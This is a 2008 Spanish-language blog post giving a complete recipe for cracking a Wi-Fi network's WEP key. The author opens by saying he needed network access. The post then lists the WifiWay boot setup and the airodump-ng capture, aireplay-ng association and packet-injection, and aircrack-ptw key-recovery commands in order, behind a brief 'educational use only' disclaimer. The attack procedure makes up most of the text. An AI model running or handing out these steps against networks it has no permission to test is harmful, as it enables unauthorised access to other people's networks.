Crackin WEP: Chingarte la WEP de una Wi-Fi

lunes, 1 de septiembre de 2008



Por necesidad de una red trabajando me puse a buscar como acceder a una red Wi-Fi protegida con clave WEP (Wired Equivalent Privacy) y me digamos que no son especialmente seguras. Existen programas como aircrack-ptw (http://www.cdc.informatik.tu-darmstadt.de/aircrack-ptw) permiten obtener la clave en unos pocos minutos, por lo que muchos ya recomiendan utilizar sistemas más avanzados como WPA o WPA2. En la web de la Universidad de Darmstadt explican cómo funciona este software, que analiza los paquetes de datos para capturar la contraseña. Con 40.000 paquetes, que se pueden obtener en menos de un minuto, las probabilidades de extraer la clave son de un 50%.

Hay otras formas de establecer dicha conexion. Aqui pongo una con base LINUX, que encontre por ahi:

Nota: Esto es para fines de investigación, aprendizaje, y verificación de seguridad. No debe usarse para vulnerar redes de otras personas. Atacar y vulnerar redes (u otros recursos) es malo, e ilegal.

Aqui pongo un "how to" en http://foro.seguridadwireless.net/index.php?topic=3227.0 que se uso como base.

A continuación, les explico los pasos a seguir para romper WEP.
Necesitamos una distribución de linux que podemos encontrar en http://www.comprawifi.net/public/wifiway/0.6/wifiway-0.6.iso. Bajamos la imagen del CD, y la quemamos.

Iniciamos la máquina con WifiWay (debe estar configurada para permitir iniciar desde CD/DVD).

Una vez iniciada, iniciamos el entorno gráfico mediante el comando:

startx

Ingresamos el canal en el que está el AP (Access Point) en la placa de red.

echo 'CANAL_DE_CAPTURA' > /sys/class/net/wifi0/device/channel

Obtenemos el BSSID, el canal, y el ESSID.

airodump-ng rtap0

Cerramos la ejecución con CONTROL-C, y utilizamos configuramos el BSSID (un número hexadecimal de 6 posiciones) en la placa de red.

echo 'BSSID_DEL_ACCESS_POINT' > /sys/class/net/wifi0/device/bssid

Una vez hecho esto, iniciamos la captura.

airodump-ng -c CANAL_DE_CAPTURA -w ARCHIVO_CAPTURA rtap0

Abrimos otra ventana y configuramos la velocidad a 2 mbps:

echo '2' > /sys/class/net/wifi0/device/rate

Subimos la placa de red.

ifconfig wifi0 up

Averiguamos la MAC address, son los 12 primeros numeros de HWaddr

ifconfig

Iniciamos una asociación con el AP.

aireplay-ng -1 0 -a BSSID_DEL_ACCESS_POINT -h MAC_ADDRESS_WIFI -e ESSID_DEL_ACCESSPOINT wifi0

Abrimos otra consola y ponemos para inyectar tráfico.

aireplay-ng -3 -b BSSID_DEL_ACCESS_POINT -e ESSID_DEL_ACCESSPOINT -h MAC_ADDRESS_WIFI wifi0

Esto debería aumentar los #data en la ventana de captura (pasa un momento antes que empiece a aumentar).
Cuando tengamos mas de 100.000 podemos extraer la clave ejecutando:

aircrack-ptw ARCHIVO_CAPTURA.cap

Esto debería encontrar la clave de red en formato hexadecimal.

Nota: En todos los comandos anteriores, wordpress convierte automáticamente las comillas a comillas formateadas. Por favor usar comillas simples.

Basado en el manual de =Tuxero=

Espero que esto haya sido de utilidad y nuevamente tomado de una forma EDUCACIONAL.



=ZeroProject=